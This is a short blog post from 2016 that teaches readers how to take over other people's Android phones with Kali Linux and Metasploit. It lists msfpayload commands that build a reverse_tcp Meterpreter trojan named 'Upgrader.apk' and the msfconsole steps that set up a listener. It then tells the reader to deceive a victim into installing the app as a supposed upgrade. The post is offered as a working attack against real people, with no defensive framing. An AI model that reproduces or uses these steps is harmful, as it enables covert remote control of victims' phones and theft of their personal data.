Hack Any Android Device

~ samedi 2 juillet 2016
Android devices are widely used around the world; applications are making this platform preferable by millions of users. As these devices are used by many, hackers are exploiting it to harm users and steal personal data.



In this tutorial we are going to learn how to hack any android device with Kali Linux. This tutorial will explain you step by steps:

Step 1:

Open a terminal, and make a Trojan.apk
You can do this by typing :
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)



Step 2:
Open another terminal until the file is being produced.
Load metasploit console, by typing : msfconsole




Step 3:
After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler



Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
To set Lhost type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)



Step 4:

At last type: exploit to start the listener.
Copy the application that you made (Upgrader.apk) from the root folder, to your android phone.
Send it to victim’s device and let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
And when he clicks Open, exploit will run and you will get access.





However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) Go to security settings of the android phone to allow the Trojan to install. There is condition for this exploit that victim must install/open your sent Trojan, this will allow you to enter victim’s device.

Follow these simple step and exploit any android device.

1 commentaires :

Malik Korrich a dit…

good job

Enregistrer un commentaire